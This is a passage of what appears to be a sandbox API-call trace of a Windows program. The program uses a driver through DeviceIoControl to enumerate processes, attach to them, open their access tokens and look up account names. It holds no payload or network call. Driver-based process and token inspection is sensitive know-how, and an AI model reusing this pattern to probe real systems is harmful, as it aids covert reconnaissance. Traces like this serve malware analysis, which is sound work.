(ApcState=0xfffff880053c85d0) [0246.159] PsReleaseProcessExitSynchronization () returned 0x2 [0246.159] ObfDereferenceObject (Object=0xfffffa80020e7060) returned 0x12 [0246.159] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.159] ObfDereferenceObject (Object=0xfffffa80020ddca0) returned 0x1 [0246.159] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.159] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.159] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.159] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0246.159] PsLookupProcessByProcessId (in: ProcessId=0x894, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.159] PsAcquireProcessExitSynchronization () returned 0x0 [0246.159] KeStackAttachProcess (in: PROCESS=0xfffffa80020e7060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020e7060, ApcState=0xfffff880053c85d0) [0246.160] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0246.160] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.160] PsReleaseProcessExitSynchronization () returned 0x2 [0246.160] ObfDereferenceObject (Object=0xfffffa80020e7060) returned 0x12 [0246.160] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.160] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0246.160] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.160] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a4) returned 0xc8 [0246.160] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0246.160] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa80020f3530, HandleInformation=0x0) returned 0x0 [0246.160] ObOpenObjectByPointer (in: Object=0xfffffa80020f3530, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0246.160] ObfDereferenceObject (Object=0xfffffa80020f3530) returned 0x14 [0246.160] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8002162b80 | out: TokenHandle=0xfffffa8002162b80*=0xc4) returned 0x0 [0246.160] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0246.160] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.160] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0246.160] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0246.162] CloseHandle (hObject=0xc4) returned 1 [0246.163] CloseHandle (hObject=0xc8) returned 1 [0246.163] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.163] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0246.163] PsLookupProcessByProcessId (in: ProcessId=0x8a4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.163] PsAcquireProcessExitSynchronization () returned 0x0 [0246.163] KeStackAttachProcess (in: PROCESS=0xfffffa80020f3530, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020f3530, ApcState=0xfffff880053c85d0) [0246.163] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80020f3d10, HandleInformation=0x0) returned 0x0 [0246.163] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.163] PsReleaseProcessExitSynchronization () returned 0x2 [0246.163] ObfDereferenceObject (Object=0xfffffa80020f3530) returned 0x12 [0246.163] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.163] ObfDereferenceObject (Object=0xfffffa80020f3d10) returned 0x1 [0246.163] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.163] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.163] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.163] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x6c, lpOverlapped=0x0) returned 1 [0246.163] PsLookupProcessByProcessId (in: ProcessId=0x8a4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.163] PsAcquireProcessExitSynchronization () returned 0x0 [0246.163] KeStackAttachProcess (in: PROCESS=0xfffffa80020f3530, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020f3530, ApcState=0xfffff880053c85d0) [0246.163] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80020e9810, HandleInformation=0x0) returned 0x0 [0246.163] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.164] PsReleaseProcessExitSynchronization () returned 0x2 [0246.164] ObfDereferenceObject (Object=0xfffffa80020f3530) returned 0x12 [0246.164] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.164] ObfDereferenceObject (Object=0xfffffa80020e9810) returned 0x1 [0246.164] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.164] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.164] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.164] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0246.164] PsLookupProcessByProcessId (in: ProcessId=0x8a4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.164] PsAcquireProcessExitSynchronization () returned 0x0 [0246.164] KeStackAttachProcess (in: PROCESS=0xfffffa80020f3530, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020f3530, ApcState=0xfffff880053c85d0) [0246.164] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0246.164] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.164] PsReleaseProcessExitSynchronization () returned 0x2 [0246.164] ObfDereferenceObject (Object=0xfffffa80020f3530) returned 0x12 [0246.164] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.164] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0246.164] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.164] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b4) returned 0xc8 [0246.164] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0246.164] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8001fc7b30, HandleInformation=0x0) returned 0x0 [0246.165] ObOpenObjectByPointer (in: Object=0xfffffa8001fc7b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0246.165] ObfDereferenceObject (Object=0xfffffa8001fc7b30) returned 0x14 [0246.165] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8002162b80 | out: TokenHandle=0xfffffa8002162b80*=0xc4) returned 0x0 [0246.165] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0246.165] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.165] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0246.165] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0246.167] CloseHandle (hObject=0xc4) returned 1 [0246.168] CloseHandle (hObject=0xc8) returned 1 [0246.168] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.168] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0246.168] PsLookupProcessByProcessId (in: ProcessId=0x8b4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.168] PsAcquireProcessExitSynchronization () returned 0x0 [0246.168] KeStackAttachProcess (in: PROCESS=0xfffffa8001fc7b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001fc7b30, ApcState=0xfffff880053c85d0) [0246.168] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80020f2d70, HandleInformation=0x0) returned 0x0 [0246.168] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.168] PsReleaseProcessExitSynchronization () returned 0x2 [0246.168] ObfDereferenceObject (Object=0xfffffa8001fc7b30) returned 0x12 [0246.168] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.168] ObfDereferenceObject (Object=0xfffffa80020f2d70) returned 0x1 [0246.168] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.168] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.168] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.168] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x82, lpOverlapped=0x0) returned 1 [0246.168] PsLookupProcessByProcessId (in: ProcessId=0x8b4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.168] PsAcquireProcessExitSynchronization () returned 0x0 [0246.168] KeStackAttachProcess (in: PROCESS=0xfffffa8001fc7b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001fc7b30, ApcState=0xfffff880053c85d0) [0246.169] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800d49bd10, HandleInformation=0x0) returned 0x0 [0246.169] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.169] PsReleaseProcessExitSynchronization () returned 0x2 [0246.169] ObfDereferenceObject (Object=0xfffffa8001fc7b30) returned 0x12 [0246.169] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.169] ObfDereferenceObject (Object=0xfffffa800d49bd10) returned 0x1 [0246.169] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.169] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.169] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.169] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0246.169] PsLookupProcessByProcessId (in: ProcessId=0x8b4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.169] PsAcquireProcessExitSynchronization () returned 0x0 [0246.169] KeStackAttachProcess (in: PROCESS=0xfffffa8001fc7b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001fc7b30, ApcState=0xfffff880053c85d0) [0246.169] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0246.169] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.169] PsReleaseProcessExitSynchronization () returned 0x2 [0246.169] ObfDereferenceObject (Object=0xfffffa8001fc7b30) returned 0x12 [0246.169] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa800307a044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307a044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.169] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0246.169] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.169] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c4) returned 0xc8 [0246.170] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0246.170] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8001f6e180, HandleInformation=0x0) returned 0x0 [0246.170] ObOpenObjectByPointer (in: Object=0xfffffa8001f6e180, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0246.170] ObfDereferenceObject (Object=0xfffffa8001f6e180) returned 0x14 [0246.170] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8002162b80 | out: TokenHandle=0xfffffa8002162b80*=0xc4) returned 0x0 [0246.170] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0246.170] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.170] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0246.170] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0246.172] CloseHandle (hObject=0xc4) returned 1 [0246.172] CloseHandle (hObject=0xc8) returned 1 [0246.172] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.172] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0246.172] PsLookupProcessByProcessId (in: ProcessId=0x8c4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.172] PsAcquireProcessExitSynchronization () returned 0x0 [0246.172] KeStackAttachProcess (in: PROCESS=0xfffffa8001f6e180, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001f6e180, ApcState=0xfffff880053c85d0) [0246.172] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80020fe1a0, HandleInformation=0x0) returned 0x0 [0246.172] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.173] PsReleaseProcessExitSynchronization () returned 0x2 [0246.173] ObfDereferenceObject (Object=0xfffffa8001f6e180) returned 0x12 [0246.173] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.173] ObfDereferenceObject (Object=0xfffffa80020fe1a0) returned 0x1 [0246.173] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.173] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.173] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.173] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x9a, lpOverlapped=0x0) returned 1 [0246.173] PsLookupProcessByProcessId (in: ProcessId=0x8c4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.173] PsAcquireProcessExitSynchronization () returned 0x0 [0246.173] KeStackAttachProcess (in: PROCESS=0xfffffa8001f6e180, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001f6e180, ApcState=0xfffff880053c85d0) [0246.173] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80020fe2f0, HandleInformation=0x0) returned 0x0 [0246.173] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.173] PsReleaseProcessExitSynchronization () returned 0x2 [0246.173] ObfDereferenceObject (Object=0xfffffa8001f6e180) returned 0x12 [0246.173] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003083044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003083044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.173] ObfDereferenceObject (Object=0xfffffa80020fe2f0) returned 0x1 [0246.173] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.173] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.173] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.174] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0246.174] PsLookupProcessByProcessId (in: ProcessId=0x8c4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.174] PsAcquireProcessExitSynchronization () returned 0x0 [0246.174] KeStackAttachProcess (in: PROCESS=0xfffffa8001f6e180, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001f6e180, ApcState=0xfffff880053c85d0) [0246.174] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0246.174] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.174] PsReleaseProcessExitSynchronization () returned 0x2 [0246.174] ObfDereferenceObject (Object=0xfffffa8001f6e180) returned 0x12 [0246.174] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.174] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0246.174] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.174] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.174] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8d4) returned 0xc8 [0246.174] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0246.174] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8001f77b30, HandleInformation=0x0) returned 0x0 [0246.174] ObOpenObjectByPointer (in: Object=0xfffffa8001f77b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0246.175] ObfDereferenceObject (Object=0xfffffa8001f77b30) returned 0x14 [0246.175] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8002162b80 | out: TokenHandle=0xfffffa8002162b80*=0xc4) returned 0x0 [0246.175] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0246.175] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.175] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0246.175] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, 